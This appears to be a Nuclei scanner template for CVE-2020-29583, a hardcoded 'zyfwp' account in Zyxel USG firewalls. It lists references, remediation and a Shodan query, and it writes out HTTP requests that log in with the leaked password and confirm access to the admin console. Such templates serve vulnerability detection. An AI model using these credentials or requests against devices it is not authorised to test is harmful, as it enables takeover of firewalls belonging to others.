id: CVE-2020-29583 info: name: ZyXel USG - Hardcoded Credentials author: canberbamber severity: critical description: | A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP. remediation: | Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue. reference: - https://www.zyxel.com/support/CVE-2020-29583.shtml - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583 - https://nvd.nist.gov/vuln/detail/CVE-2020-29583 - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html - http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29583 cwe-id: CWE-522 epss-score: 0.95661 epss-percentile: 0.99203 cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: zyxel product: usg20-vpn_firmware shodan-query: title:"USG FLEX 100" tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev http: - raw: - | GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1 Host: {{Hostname}} - | GET /ext-js/index.html HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body_2 words: - 'data-qtip="Web Console' - 'CLI' - 'Configuration">' condition: and - type: status status: - 200 # digest: 4b0a00483046022100b6b67ecc110b556184638ab46f0cb56804b3c4225c87a7fdf138764204d8e596022100a6f445d42e5836b942ae67614ce5bbe4b4af76fa11ceae434f80611beeb225df:922c64590222798bb761d5b6d8e72950